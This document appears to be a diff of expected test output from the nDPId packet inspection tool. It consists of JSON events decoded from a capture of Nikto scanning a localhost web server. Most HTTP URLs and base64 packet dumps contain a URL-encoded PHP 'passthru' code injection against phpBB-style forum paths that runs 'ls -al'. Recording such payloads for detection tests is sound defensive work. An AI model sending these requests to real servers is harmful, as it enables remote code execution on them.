-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 